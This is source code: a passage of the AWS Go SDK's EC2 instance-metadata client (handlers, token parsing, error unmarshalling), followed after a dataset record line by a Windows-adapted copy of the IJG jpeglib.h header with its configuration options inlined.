	return NewClient(*resolved.Config, resolved.Handlers, resolved.Endpoint, resolved.SigningRegion)
}
// NewClient returns a new EC2Metadata client. Should be used to create
// a client when not using a session. Generally using just New with a session
// is preferred.
//
// If an unmodified HTTP client is provided from the stdlib default, or no client
// the EC2RoleProvider's EC2Metadata HTTP client's timeout will be shortened.
// To disable this set Config.EC2MetadataDisableTimeoutOverride to false. Enabled by default.
func NewClient(cfg aws.Config, handlers request.Handlers, endpoint, signingRegion string, opts ...func(*client.Client)) *EC2Metadata {
	if !aws.BoolValue(cfg.EC2MetadataDisableTimeoutOverride) && httpClientZero(cfg.HTTPClient) {
		// If the http client is unmodified and this feature is not disabled
		// set custom timeouts for EC2Metadata requests.
		cfg.HTTPClient = &http.Client{
			// use a shorter timeout than default because the metadata
			// service is local if it is running, and to fail faster
			// if not running on an ec2 instance.
			Timeout: 1 * time.Second,
		}
		// max number of retries on the client operation
		cfg.MaxRetries = aws.Int(2)
	}
	svc := &EC2Metadata{
		Client: client.New(
			cfg,
			metadata.ClientInfo{
				ServiceName: ServiceName,
				ServiceID:   ServiceName,
				Endpoint:    endpoint,
				APIVersion:  "latest",
			},
			handlers,
		),
	}
	// token provider instance; shared by the two handlers registered below.
	tp := newTokenProvider(svc, defaultTTL)
	// NamedHandler for fetching token, runs during the Sign phase.
	svc.Handlers.Sign.PushBackNamed(request.NamedHandler{
		Name: fetchTokenHandlerName,
		Fn:   tp.fetchTokenHandler,
	})
	// NamedHandler for enabling token provider, runs on request completion.
	svc.Handlers.Complete.PushBackNamed(request.NamedHandler{
		Name: enableTokenProviderHandlerName,
		Fn:   tp.enableTokenProviderHandler,
	})
	// Metadata responses are plain text, so install the plain-text
	// unmarshalers instead of the SDK's default protocol unmarshalers.
	svc.Handlers.Unmarshal.PushBackNamed(unmarshalHandler)
	svc.Handlers.UnmarshalError.PushBack(unmarshalError)
	// The only request validation needed here is that an endpoint exists.
	svc.Handlers.Validate.Clear()
	svc.Handlers.Validate.PushBack(validateEndpointHandler)
	// Disable the EC2 Metadata service if the environment variable is set.
	// This short-circuits the service's functionality to always fail to send
	// requests.
	if strings.ToLower(os.Getenv(disableServiceEnvVar)) == "true" {
		svc.Handlers.Send.SwapNamed(request.NamedHandler{
			Name: corehandlers.SendHandler.Name,
			Fn: func(r *request.Request) {
				r.HTTPResponse = &http.Response{
					Header: http.Header{},
				}
				r.Error = awserr.New(
					request.CanceledErrorCode,
					"EC2 IMDS access disabled via "+disableServiceEnvVar+" env var",
					nil)
			},
		})
	}
	// Add additional options to the service config
	for _, option := range opts {
		option(svc.Client)
	}
	return svc
}
func httpClientZero(c *http.Client) bool {
return c == nil || (c.Transport == nil && c.CheckRedirect == nil && c.Jar == nil && c.Timeout == 0)
}
// metadataOutput holds the plain-text body of a metadata response.
type metadataOutput struct {
	Content string
}

// tokenOutput holds the result of a token fetch: the token value (response
// body) and the lifetime parsed from the TTL response header.
type tokenOutput struct {
	Token string
	TTL   time.Duration
}
// unmarshal token handler is used to parse the response of a getToken operation
var unmarshalTokenHandler = request.NamedHandler{
	Name: unmarshalTokenHandlerName,
	Fn: func(r *request.Request) {
		defer r.HTTPResponse.Body.Close()
		var b bytes.Buffer
		if _, err := io.Copy(&b, r.HTTPResponse.Body); err != nil {
			r.Error = awserr.NewRequestFailure(awserr.New(request.ErrCodeSerialization,
				"unable to unmarshal EC2 metadata response", err), r.HTTPResponse.StatusCode, r.RequestID)
			return
		}
		// The TTL comes back as a response header, not in the body.
		v := r.HTTPResponse.Header.Get(ttlHeader)
		data, ok := r.Data.(*tokenOutput)
		if !ok {
			// Output target is not a tokenOutput; nothing to populate.
			return
		}
		// The response body is the token itself.
		data.Token = b.String()
		// TTL is in seconds
		i, err := strconv.ParseInt(v, 10, 64)
		if err != nil {
			r.Error = awserr.NewRequestFailure(awserr.New(request.ParamFormatErrCode,
				"unable to parse EC2 token TTL response", err), r.HTTPResponse.StatusCode, r.RequestID)
			return
		}
		t := time.Duration(i) * time.Second
		data.TTL = t
	},
}
// unmarshalHandler copies the plain-text response body of a metadata
// request into the metadataOutput stored on the request, if any.
var unmarshalHandler = request.NamedHandler{
	Name: unmarshalMetadataHandlerName,
	Fn: func(r *request.Request) {
		defer r.HTTPResponse.Body.Close()
		var buf bytes.Buffer
		_, copyErr := io.Copy(&buf, r.HTTPResponse.Body)
		if copyErr != nil {
			r.Error = awserr.NewRequestFailure(
				awserr.New(request.ErrCodeSerialization, "unable to unmarshal EC2 metadata response", copyErr),
				r.HTTPResponse.StatusCode, r.RequestID)
			return
		}
		out, ok := r.Data.(*metadataOutput)
		if ok {
			out.Content = buf.String()
		}
	},
}
// unmarshalError converts a failed metadata response into a request failure,
// preserving the raw response body text as the underlying error message.
func unmarshalError(r *request.Request) {
	defer r.HTTPResponse.Body.Close()
	var body bytes.Buffer
	_, copyErr := io.Copy(&body, r.HTTPResponse.Body)
	if copyErr != nil {
		r.Error = awserr.NewRequestFailure(
			awserr.New(request.ErrCodeSerialization, "unable to unmarshal EC2 metadata error response", copyErr),
			r.HTTPResponse.StatusCode, r.RequestID)
		return
	}
	// Response body format is not consistent between metadata endpoints.
	// Grab the error message as a string and include that as the source error
	r.Error = awserr.NewRequestFailure(
		awserr.New("EC2MetadataError", "failed to make EC2Metadata request", errors.New(body.String())),
		r.HTTPResponse.StatusCode, r.RequestID)
}
// validateEndpointHandler fails the request early when no endpoint has been
// configured for the client.
func validateEndpointHandler(r *request.Request) {
	if r.ClientInfo.Endpoint != "" {
		return
	}
	r.Error = aws.ErrMissingEndpoint
}
| {
"pile_set_name": "Github"
} |
/*
* jpeglib.h
*
* Copyright (C) 1991-1998, Thomas G. Lane.
* This file is part of the Independent JPEG Group's software.
* For conditions of distribution and use, see the accompanying README file.
* Visit the website at: http://www.ijg.org/
*
* This file defines the application interface for the JPEG library.
* Most applications using the library need only include this file,
* and perhaps jerror.h if they want to know the exact error codes.
*/
#ifndef JPEGLIB_H
#define JPEGLIB_H
/*
* First we include the configuration files that record how this
* installation of the JPEG library is set up. jconfig.h can be
* generated automatically for many systems. jmorecfg.h contains
* manual configuration options that most people need not worry about.
*/
#ifndef JCONFIG_INCLUDED /* in case jinclude.h already did */
#include <stdio.h>
#include <stdlib.h>
#include <iostream>
#include <string.h>
#include <stdarg.h>
#include <math.h>
#include <malloc.h>
#include <string.h>
#include <tchar.h>
#include <windows.h>
/*
* jconfig.doc
*
* Copyright (C) 1991-1994, Thomas G. Lane.
* This file is part of the Independent JPEG Group's software.
* For conditions of distribution and use, see the accompanying README file.
*
* This file documents the configuration options that are required to
* customize the JPEG software for a particular system.
*
* The actual configuration options for a particular installation are stored
* in jconfig.h. On many machines, jconfig.h can be generated automatically
* or copied from one of the "canned" jconfig files that we supply. But if
* you need to generate a jconfig.h file by hand, this file tells you how.
*
* DO NOT EDIT THIS FILE --- IT WON'T ACCOMPLISH ANYTHING.
* EDIT A COPY NAMED JCONFIG.H.
*/
/*
 * These symbols indicate the properties of your machine or compiler.
 * #define the symbol if yes, #undef it if no.
 *
 * NOTE(review): this inlined jconfig section appears hand-tuned for Win32
 * (<windows.h> is included above) -- confirm before reusing on other
 * platforms.
 */
/* Does your compiler support function prototypes?
 * (If not, you also need to use ansi2knr, see install.doc)
 */
#define HAVE_PROTOTYPES
/* Does your compiler support the declaration "unsigned char" ?
 * How about "unsigned short" ?
 */
#define HAVE_UNSIGNED_CHAR
#define HAVE_UNSIGNED_SHORT
/* Define "void" as "char" if your compiler doesn't know about type void.
 * NOTE: be sure to define void such that "void *" represents the most general
 * pointer type, e.g., that returned by malloc().
 */
/* #define void char */
/* Define "const" as empty if your compiler doesn't know the "const" keyword.
 */
/* #define const */
/* Define this if an ordinary "char" type is unsigned.
 * If you're not sure, leaving it undefined will work at some cost in speed.
 * If you defined HAVE_UNSIGNED_CHAR then the speed difference is minimal.
 */
#undef CHAR_IS_UNSIGNED
/* Define this if your system has an ANSI-conforming <stddef.h> file.
 */
#define HAVE_STDDEF_H
/* Define this if your system has an ANSI-conforming <stdlib.h> file.
 */
#define HAVE_STDLIB_H
/* Define this if your system does not have an ANSI/SysV <string.h>,
 * but does have a BSD-style <strings.h>.
 */
#undef NEED_BSD_STRINGS
/* Define this if your system does not provide typedef size_t in any of the
 * ANSI-standard places (stddef.h, stdlib.h, or stdio.h), but places it in
 * <sys/types.h> instead.
 */
#undef NEED_SYS_TYPES_H
/* For 80x86 machines, you need to define NEED_FAR_POINTERS,
 * unless you are using a large-data memory model or 80386 flat-memory mode.
 * On less brain-damaged CPUs this symbol must not be defined.
 * (Defining this symbol causes large data structures to be referenced through
 * "far" pointers and to be allocated with a special version of malloc.)
 */
#undef NEED_FAR_POINTERS
/* Define this if your linker needs global names to be unique in less
 * than the first 15 characters.
 */
#undef NEED_SHORT_EXTERNAL_NAMES
/* Although a real ANSI C compiler can deal perfectly well with pointers to
 * unspecified structures (see "incomplete types" in the spec), a few pre-ANSI
 * and pseudo-ANSI compilers get confused. To keep one of these bozos happy,
 * define INCOMPLETE_TYPES_BROKEN. This is not recommended unless you
 * actually get "missing structure definition" warnings or errors while
 * compiling the JPEG code.
 */
#undef INCOMPLETE_TYPES_BROKEN
/*
 * The following options affect code selection within the JPEG library,
 * but they don't need to be visible to applications using the library.
 * To minimize application namespace pollution, the symbols won't be
 * defined unless JPEG_INTERNALS has been defined.
 */
#ifdef JPEG_INTERNALS
/* Define this if your compiler implements ">>" on signed values as a logical
 * (unsigned) shift; leave it undefined if ">>" is a signed (arithmetic) shift,
 * which is the normal and rational definition.
 */
#undef RIGHT_SHIFT_IS_UNSIGNED
#endif /* JPEG_INTERNALS */
/*
 * The remaining options do not affect the JPEG library proper,
 * but only the sample applications cjpeg/djpeg (see cjpeg.c, djpeg.c).
 * Other applications can ignore these.
 */
#ifdef JPEG_CJPEG_DJPEG
/* These defines indicate which image (non-JPEG) file formats are allowed. */
#define BMP_SUPPORTED /* BMP image file format */
#define GIF_SUPPORTED /* GIF image file format */
#define PPM_SUPPORTED /* PBMPLUS PPM/PGM image file format */
#undef RLE_SUPPORTED /* Utah RLE image file format */
#define TARGA_SUPPORTED /* Targa image file format */
/* Define this if you want to name both input and output files on the command
 * line, rather than using stdout and optionally stdin. You MUST do this if
 * your system can't cope with binary I/O to stdin/stdout. See comments at
 * head of cjpeg.c or djpeg.c.
 */
#undef TWO_FILE_COMMANDLINE
/* Define this if your system needs explicit cleanup of temporary files.
 * This is crucial under MS-DOS, where the temporary "files" may be areas
 * of extended memory; on most other systems it's not as important.
 */
#undef NEED_SIGNAL_CATCHER
/* By default, we open image files with fopen(...,"rb") or fopen(...,"wb").
 * This is necessary on systems that distinguish text files from binary files,
 * and is harmless on most systems that don't. If you have one of the rare
 * systems that complains about the "b" spec, define this symbol.
 */
#undef DONT_USE_B_MODE
/* Define this if you want percent-done progress reports from cjpeg/djpeg.
 */
#undef PROGRESS_REPORT
/* NOTE(review): HAVE_BOOLEAN is only defined when JPEG_CJPEG_DJPEG is set;
 * the commented-out "typedef int boolean" further down then relies on a
 * platform header (presumably <windows.h>/<rpcndr.h>) supplying boolean in
 * the library build -- confirm.
 */
#define HAVE_BOOLEAN
#endif /* JPEG_CJPEG_DJPEG */
#endif /* ifndef JCONFIG_INCLUDED */
/*
 * Define BITS_IN_JSAMPLE as either
 * 8 for 8-bit sample values (the usual setting)
 * 12 for 12-bit sample values
 * Only 8 and 12 are legal data precisions for lossy JPEG according to the
 * JPEG standard, and the IJG code does not support anything else!
 * We do not support run-time selection of data precision, sorry.
 */
#define BITS_IN_JSAMPLE 8 /* use 8 or 12 */
/*
 * Maximum number of components (color channels) allowed in JPEG image.
 * To meet the letter of the JPEG spec, set this to 255. However, darn
 * few applications need more than 4 channels (maybe 5 for CMYK + alpha
 * mask). We recommend 10 as a reasonable compromise; use 4 if you are
 * really short on memory. (Each allowed component costs a hundred or so
 * bytes of storage, whether actually used in an image or not.)
 */
#define MAX_COMPONENTS 10 /* maximum number of image components */
/*
 * Basic data types.
 * You may need to change these if you have a machine with unusual data
 * type sizes; for example, "char" not 8 bits, "short" not 16 bits,
 * or "long" not 32 bits. We don't care whether "int" is 16 or 32 bits,
 * but it had better be at least 16.
 */
/* Representation of a single sample (pixel element value).
 * We frequently allocate large arrays of these, so it's important to keep
 * them small. But if you have memory to burn and access to char or short
 * arrays is very slow on your hardware, you might want to change these.
 */
#if BITS_IN_JSAMPLE == 8
/* JSAMPLE should be the smallest type that will hold the values 0..255.
 * You can use a signed char by having GETJSAMPLE mask it with 0xFF.
 */
#ifdef HAVE_UNSIGNED_CHAR
typedef unsigned char JSAMPLE;
#define GETJSAMPLE(value) ((int) (value))
#else /* not HAVE_UNSIGNED_CHAR */
typedef char JSAMPLE;
#ifdef CHAR_IS_UNSIGNED
#define GETJSAMPLE(value) ((int) (value))
#else
#define GETJSAMPLE(value) ((int) (value) & 0xFF)
#endif /* CHAR_IS_UNSIGNED */
#endif /* HAVE_UNSIGNED_CHAR */
#define MAXJSAMPLE 255
#define CENTERJSAMPLE 128
#endif /* BITS_IN_JSAMPLE == 8 */
#if BITS_IN_JSAMPLE == 12
/* JSAMPLE should be the smallest type that will hold the values 0..4095.
 * On nearly all machines "short" will do nicely.
 * (12-bit builds roughly double the memory used for sample arrays.)
 */
typedef short JSAMPLE;
#define GETJSAMPLE(value) ((int) (value))
#define MAXJSAMPLE 4095
#define CENTERJSAMPLE 2048
#endif /* BITS_IN_JSAMPLE == 12 */
/* Representation of a DCT frequency coefficient.
 * This should be a signed value of at least 16 bits; "short" is usually OK.
 * Again, we allocate large arrays of these, but you can change to int
 * if you have memory to burn and "short" is really slow.
 */
typedef short JCOEF;
/* Compressed datastreams are represented as arrays of JOCTET.
 * These must be EXACTLY 8 bits wide, at least once they are written to
 * external storage. Note that when using the stdio data source/destination
 * managers, this is also the data type passed to fread/fwrite.
 */
#ifdef HAVE_UNSIGNED_CHAR
typedef unsigned char JOCTET;
#define GETJOCTET(value) (value)
#else /* not HAVE_UNSIGNED_CHAR */
typedef char JOCTET;
#ifdef CHAR_IS_UNSIGNED
#define GETJOCTET(value) (value)
#else
#define GETJOCTET(value) ((value) & 0xFF)
#endif /* CHAR_IS_UNSIGNED */
#endif /* HAVE_UNSIGNED_CHAR */
/* These typedefs are used for various table entries and so forth.
 * They must be at least as wide as specified; but making them too big
 * won't cost a huge amount of memory, so we don't provide special
 * extraction code like we did for JSAMPLE. (In other words, these
 * typedefs live at a different point on the speed/space tradeoff curve.)
 */
/* UINT8 must hold at least the values 0..255. */
#ifdef HAVE_UNSIGNED_CHAR
typedef unsigned char UINT8;
#else /* not HAVE_UNSIGNED_CHAR */
#ifdef CHAR_IS_UNSIGNED
typedef char UINT8;
#else /* not CHAR_IS_UNSIGNED */
typedef short UINT8;
#endif /* CHAR_IS_UNSIGNED */
#endif /* HAVE_UNSIGNED_CHAR */
/* UINT16 must hold at least the values 0..65535. */
#ifdef HAVE_UNSIGNED_SHORT
typedef unsigned short UINT16;
#else /* not HAVE_UNSIGNED_SHORT */
typedef unsigned int UINT16;
#endif /* HAVE_UNSIGNED_SHORT */
/* INT16 must hold at least the values -32768..32767. */
#ifndef XMD_H /* X11/xmd.h correctly defines INT16 */
typedef short INT16;
#endif
/* INT32 must hold at least signed 32-bit values. */
/* NOTE(review): stock IJG headers guard this with "#ifndef XMD_H"; this copy
 * only defines INT32 when NEED_INT32 is set, so something else (likely a
 * Windows SDK header included above) must supply INT32 otherwise -- confirm.
 */
#ifdef NEED_INT32 /* X11/xmd.h correctly defines INT32 */
typedef long INT32;
#endif
/* Datatype used for image dimensions. The JPEG standard only supports
 * images up to 64K*64K due to 16-bit fields in SOF markers. Therefore
 * "unsigned int" is sufficient on all machines. However, if you need to
 * handle larger images and you don't mind deviating from the spec, you
 * can change this datatype.
 */
typedef unsigned int JDIMENSION;
#define JPEG_MAX_DIMENSION 65500L /* a tad under 64K to prevent overflows */
/* These macros are used in all function definitions and extern declarations.
 * You could modify them if you need to change function linkage conventions;
 * in particular, you'll need to do that to make the library a Windows DLL.
 * Another application is to make all functions global for use with debuggers
 * or code profilers that require it.
 */
/* a function called through method pointers: */
#define METHODDEF(type) static type
/* a function used only in its module: */
#define LOCAL(type) static type
/* a function referenced thru EXTERNs: */
#define GLOBAL(type) type
/* a reference to a GLOBAL function: */
#define EXTERN(type) extern type
/* This macro is used to declare a "method", that is, a function pointer.
 * We want to supply prototype parameters if the compiler can cope.
 * Note that the arglist parameter must be parenthesized!
 * Again, you can customize this if you need special linkage keywords.
 */
#ifdef HAVE_PROTOTYPES
#define JMETHOD(type,methodname,arglist) type (*methodname) arglist
#else
#define JMETHOD(type,methodname,arglist) type (*methodname) ()
#endif
/* Here is the pseudo-keyword for declaring pointers that must be "far"
 * on 80x86 machines. Most of the specialized coding for 80x86 is handled
 * by just saying "FAR *" where such a pointer is needed. In a few places
 * explicit coding is needed; see uses of the NEED_FAR_POINTERS symbol.
 */
#ifdef NEED_FAR_POINTERS
#define FAR far
#else
/* NOTE(review): the empty "#define FAR" of stock jpeglib is commented out
 * here, yet FAR is still used in the typedefs below; this copy evidently
 * relies on <windows.h> (windef.h) to define FAR, which makes the header
 * Windows-only -- confirm before porting.
 */
//#define FAR
#endif
/*
 * On a few systems, type boolean and/or its values FALSE, TRUE may appear
 * in standard header files. Or you may have conflicts with application-
 * specific header files that you want to include together with these files.
 * Defining HAVE_BOOLEAN before including jpeglib.h should make it work.
 */
#ifndef HAVE_BOOLEAN
/* NOTE(review): the boolean typedef is commented out, presumably because a
 * Windows header already declares boolean -- confirm. */
//typedef int boolean;
#endif
#ifndef FALSE /* in case these macros already exist */
#define FALSE 0 /* values of boolean */
#endif
#ifndef TRUE
#define TRUE 1
#endif
/*
 * The remaining options affect code selection within the JPEG library,
 * but they don't need to be visible to most applications using the library.
 * To minimize application namespace pollution, the symbols won't be
 * defined unless JPEG_INTERNALS or JPEG_INTERNAL_OPTIONS has been defined.
 */
#ifdef JPEG_INTERNALS
/* JPEG_INTERNALS implies the internal-options section below. */
#define JPEG_INTERNAL_OPTIONS
#endif
#ifdef JPEG_INTERNAL_OPTIONS
/*
 * These defines indicate whether to include various optional functions.
 * Undefining some of these symbols will produce a smaller but less capable
 * library. Note that you can leave certain source files out of the
 * compilation/linking process if you've #undef'd the corresponding symbols.
 * (You may HAVE to do that if your compiler doesn't like null source files.)
 */
/* Arithmetic coding is unsupported for legal reasons. Complaints to IBM. */
/* Capability options common to encoder and decoder: */
#define DCT_ISLOW_SUPPORTED /* slow but accurate integer algorithm */
#define DCT_IFAST_SUPPORTED /* faster, less accurate integer method */
#define DCT_FLOAT_SUPPORTED /* floating-point: accurate, fast on fast HW */
/* Encoder capability options: */
#undef C_ARITH_CODING_SUPPORTED /* Arithmetic coding back end? */
#define C_MULTISCAN_FILES_SUPPORTED /* Multiple-scan JPEG files? */
#define C_PROGRESSIVE_SUPPORTED /* Progressive JPEG? (Requires MULTISCAN)*/
#define ENTROPY_OPT_SUPPORTED /* Optimization of entropy coding parms? */
/* Note: if you selected 12-bit data precision, it is dangerous to turn off
 * ENTROPY_OPT_SUPPORTED. The standard Huffman tables are only good for 8-bit
 * precision, so jchuff.c normally uses entropy optimization to compute
 * usable tables for higher precision. If you don't want to do optimization,
 * you'll have to supply different default Huffman tables.
 * The exact same statements apply for progressive JPEG: the default tables
 * don't work for progressive mode. (This may get fixed, however.)
 */
#define INPUT_SMOOTHING_SUPPORTED /* Input image smoothing option? */
/* Decoder capability options: */
#undef D_ARITH_CODING_SUPPORTED /* Arithmetic coding back end? */
#define D_MULTISCAN_FILES_SUPPORTED /* Multiple-scan JPEG files? */
#define D_PROGRESSIVE_SUPPORTED /* Progressive JPEG? (Requires MULTISCAN)*/
#define SAVE_MARKERS_SUPPORTED /* jpeg_save_markers() needed? */
#define BLOCK_SMOOTHING_SUPPORTED /* Block smoothing? (Progressive only) */
#define IDCT_SCALING_SUPPORTED /* Output rescaling via IDCT? */
#undef UPSAMPLE_SCALING_SUPPORTED /* Output rescaling at upsample stage? */
#define UPSAMPLE_MERGING_SUPPORTED /* Fast path for sloppy upsampling? */
#define QUANT_1PASS_SUPPORTED /* 1-pass color quantization? */
#define QUANT_2PASS_SUPPORTED /* 2-pass color quantization? */
/* more capability options later, no doubt */
/*
 * Ordering of RGB data in scanlines passed to or from the application.
 * If your application wants to deal with data in the order B,G,R, just
 * change these macros. You can also deal with formats such as R,G,B,X
 * (one extra byte per pixel) by changing RGB_PIXELSIZE. Note that changing
 * the offsets will also change the order in which colormap data is organized.
 * RESTRICTIONS:
 * 1. The sample applications cjpeg,djpeg do NOT support modified RGB formats.
 * 2. These macros only affect RGB<=>YCbCr color conversion, so they are not
 * useful if you are using JPEG color spaces other than YCbCr or grayscale.
 * 3. The color quantizer modules will not behave desirably if RGB_PIXELSIZE
 * is not 3 (they don't understand about dummy color components!). So you
 * can't use color quantization if you change that value.
 */
#define RGB_RED 0 /* Offset of Red in an RGB scanline element */
#define RGB_GREEN 1 /* Offset of Green */
#define RGB_BLUE 2 /* Offset of Blue */
#define RGB_PIXELSIZE 3 /* JSAMPLEs per RGB scanline element */
/* Definitions for speed-related optimizations. */
/* If your compiler supports inline functions, define INLINE
 * as the inline keyword; otherwise define it as empty.
 */
#ifndef INLINE
#ifdef __GNUC__ /* for instance, GNU C knows about inline */
#define INLINE __inline__
#endif
#ifndef INLINE
#define INLINE /* default is to define it as empty */
#endif
#endif
/* On some machines (notably 68000 series) "int" is 32 bits, but multiplying
 * two 16-bit shorts is faster than multiplying two ints. Define MULTIPLIER
 * as short on such a machine. MULTIPLIER must be at least 16 bits wide.
 */
#ifndef MULTIPLIER
#define MULTIPLIER int /* type for fastest integer multiply */
#endif
/* FAST_FLOAT should be either float or double, whichever is done faster
 * by your compiler. (Note that this type is only used in the floating point
 * DCT routines, so it only matters if you've defined DCT_FLOAT_SUPPORTED.)
 * Typically, float is faster in ANSI C compilers, while double is faster in
 * pre-ANSI compilers (because they insist on converting to double anyway).
 * The code below therefore chooses float if we have ANSI-style prototypes.
 */
#ifndef FAST_FLOAT
#ifdef HAVE_PROTOTYPES
#define FAST_FLOAT float
#else
#define FAST_FLOAT double
#endif
#endif
#endif /* JPEG_INTERNAL_OPTIONS */
#if defined(__cplusplus)
extern "C" {
#endif
/* Version ID for the JPEG library.
* Might be useful for tests like "#if JPEG_LIB_VERSION >= 60".
*/
#define JPEG_LIB_VERSION 62 /* Version 6b */
/* Various constants determining the sizes of things.
* All of these are specified by the JPEG standard, so don't change them
* if you want to be compatible.
*/
#define DCTSIZE 8 /* The basic DCT block is 8x8 samples */
#define DCTSIZE2 64 /* DCTSIZE squared; # of elements in a block */
#define NUM_QUANT_TBLS 4 /* Quantization tables are numbered 0..3 */
#define NUM_HUFF_TBLS 4 /* Huffman tables are numbered 0..3 */
#define NUM_ARITH_TBLS 16 /* Arith-coding tables are numbered 0..15 */
#define MAX_COMPS_IN_SCAN 4 /* JPEG limit on # of components in one scan */
#define MAX_SAMP_FACTOR 4 /* JPEG limit on sampling factors */
/* Unfortunately, some bozo at Adobe saw no reason to be bound by the standard;
* the PostScript DCT filter can emit files with many more than 10 blocks/MCU.
* If you happen to run across such a file, you can up D_MAX_BLOCKS_IN_MCU
* to handle it. We even let you do this from the jconfig.h file. However,
* we strongly discourage changing C_MAX_BLOCKS_IN_MCU; just because Adobe
* sometimes emits noncompliant files doesn't mean you should too.
*/
#define C_MAX_BLOCKS_IN_MCU 10 /* compressor's limit on blocks per MCU */
/* Only the decompressor's limit is user-overridable (via jconfig.h). */
#ifndef D_MAX_BLOCKS_IN_MCU
#define D_MAX_BLOCKS_IN_MCU 10 /* decompressor's limit on blocks per MCU */
#endif
/* Data structures for images (arrays of samples and of DCT coefficients).
* On 80x86 machines, the image arrays are too big for near pointers,
* but the pointer arrays can fit in near memory.
* (Hence FAR on the data pointers but not on the pointer-array typedefs.)
*/
typedef JSAMPLE FAR *JSAMPROW; /* ptr to one image row of pixel samples. */
typedef JSAMPROW *JSAMPARRAY; /* ptr to some rows (a 2-D sample array) */
typedef JSAMPARRAY *JSAMPIMAGE; /* a 3-D sample array: top index is color */
typedef JCOEF JBLOCK[DCTSIZE2]; /* one block of coefficients */
typedef JBLOCK FAR *JBLOCKROW; /* pointer to one row of coefficient blocks */
typedef JBLOCKROW *JBLOCKARRAY; /* a 2-D array of coefficient blocks */
typedef JBLOCKARRAY *JBLOCKIMAGE; /* a 3-D array of coefficient blocks */
typedef JCOEF FAR *JCOEFPTR; /* useful in a couple of places */
/* Types for JPEG compression parameters and working tables. */
/* DCT coefficient quantization tables. */
typedef struct {
/* This array gives the coefficient quantizers in natural array order
* (not the zigzag order in which they are stored in a JPEG DQT marker).
* CAUTION: IJG versions prior to v6a kept this array in zigzag order.
*/
UINT16 quantval[DCTSIZE2]; /* quantization step for each coefficient */
/* This field is used only during compression. It's initialized FALSE when
* the table is created, and set TRUE when it's been output to the file.
* You could suppress output of a table by setting this to TRUE.
* (See jpeg_suppress_tables for an example.)
*/
boolean sent_table; /* TRUE when table has been output */
} JQUANT_TBL;
/* Huffman coding tables.
* bits[] and huffval[] mirror the wire format of a DHT marker segment.
*/
typedef struct {
/* These two fields directly represent the contents of a JPEG DHT marker */
UINT8 bits[17]; /* bits[k] = # of symbols with codes of */
/* length k bits; bits[0] is unused */
UINT8 huffval[256]; /* The symbols, in order of incr code length */
/* This field is used only during compression. It's initialized FALSE when
* the table is created, and set TRUE when it's been output to the file.
* You could suppress output of a table by setting this to TRUE.
* (See jpeg_suppress_tables for an example.)
*/
boolean sent_table; /* TRUE when table has been output */
} JHUFF_TBL;
/* Basic info about one component (color channel).
* One of these exists per image component; cinfo->comp_info points to
* an array of them.
*/
typedef struct {
/* These values are fixed over the whole image. */
/* For compression, they must be supplied by parameter setup; */
/* for decompression, they are read from the SOF marker. */
int component_id; /* identifier for this component (0..255) */
int component_index; /* its index in SOF or cinfo->comp_info[] */
int h_samp_factor; /* horizontal sampling factor (1..4) */
int v_samp_factor; /* vertical sampling factor (1..4) */
int quant_tbl_no; /* quantization table selector (0..3) */
/* These values may vary between scans. */
/* For compression, they must be supplied by parameter setup; */
/* for decompression, they are read from the SOS marker. */
/* The decompressor output side may not use these variables. */
int dc_tbl_no; /* DC entropy table selector (0..3) */
int ac_tbl_no; /* AC entropy table selector (0..3) */
/* Remaining fields should be treated as private by applications. */
/* These values are computed during compression or decompression startup: */
/* Component's size in DCT blocks.
* Any dummy blocks added to complete an MCU are not counted; therefore
* these values do not depend on whether a scan is interleaved or not.
*/
JDIMENSION width_in_blocks;
JDIMENSION height_in_blocks;
/* Size of a DCT block in samples. Always DCTSIZE for compression.
* For decompression this is the size of the output from one DCT block,
* reflecting any scaling we choose to apply during the IDCT step.
* Values of 1,2,4,8 are likely to be supported. Note that different
* components may receive different IDCT scalings.
*/
int DCT_scaled_size;
/* The downsampled dimensions are the component's actual, unpadded number
* of samples at the main buffer (preprocessing/compression interface), thus
* downsampled_width = ceil(image_width * Hi/Hmax)
* and similarly for height. For decompression, IDCT scaling is included, so
* downsampled_width = ceil(image_width * Hi/Hmax * DCT_scaled_size/DCTSIZE)
*/
JDIMENSION downsampled_width; /* actual width in samples */
JDIMENSION downsampled_height; /* actual height in samples */
/* This flag is used only for decompression. In cases where some of the
* components will be ignored (eg grayscale output from YCbCr image),
* we can skip most computations for the unused components.
*/
boolean component_needed; /* do we need the value of this component? */
/* These values are computed before starting a scan of the component. */
/* The decompressor output side may not use these variables. */
int MCU_width; /* number of blocks per MCU, horizontally */
int MCU_height; /* number of blocks per MCU, vertically */
int MCU_blocks; /* MCU_width * MCU_height */
int MCU_sample_width; /* MCU width in samples, MCU_width*DCT_scaled_size */
int last_col_width; /* # of non-dummy blocks across in last MCU */
int last_row_height; /* # of non-dummy blocks down in last MCU */
/* Saved quantization table for component; NULL if none yet saved.
* See jdinput.c comments about the need for this information.
* This field is currently used only for decompression.
*/
JQUANT_TBL * quant_table;
/* Private per-component storage for DCT or IDCT subsystem. */
void * dct_table;
} jpeg_component_info;
/* The script for encoding a multiple-scan file is an array of these:
* one entry per scan.  (See cinfo->scan_info / num_scans.)
*/
typedef struct {
int comps_in_scan; /* number of components encoded in this scan */
int component_index[MAX_COMPS_IN_SCAN]; /* their SOF/comp_info[] indexes */
int Ss, Se; /* progressive JPEG spectral selection parms */
int Ah, Al; /* progressive JPEG successive approx. parms */
} jpeg_scan_info;
/* The decompressor can save APPn and COM markers in a list of these:
* a singly linked list headed at cinfo->marker_list.
*/
typedef struct jpeg_marker_struct FAR * jpeg_saved_marker_ptr;
struct jpeg_marker_struct {
jpeg_saved_marker_ptr next; /* next in list, or NULL */
UINT8 marker; /* marker code: JPEG_COM, or JPEG_APP0+n */
unsigned int original_length; /* # bytes of data in the file */
unsigned int data_length; /* # bytes of data saved at data[] */
JOCTET FAR * data; /* the data contained in the marker */
/* the marker length word is not counted in data_length or original_length */
};
/* Known color spaces.
* Used both for the source image colorspace and for the JPEG-internal one.
*/
typedef enum {
JCS_UNKNOWN, /* error/unspecified */
JCS_GRAYSCALE, /* monochrome */
JCS_RGB, /* red/green/blue */
JCS_YCbCr, /* Y/Cb/Cr (also known as YUV) */
JCS_CMYK, /* C/M/Y/K */
JCS_YCCK /* Y/Cb/Cr/K */
} J_COLOR_SPACE;
/* DCT/IDCT algorithm options. */
typedef enum {
JDCT_ISLOW, /* slow but accurate integer algorithm */
JDCT_IFAST, /* faster, less accurate integer method */
JDCT_FLOAT /* floating-point: accurate, fast on fast HW */
} J_DCT_METHOD;
#ifndef JDCT_DEFAULT /* may be overridden in jconfig.h */
#define JDCT_DEFAULT JDCT_ISLOW
#endif
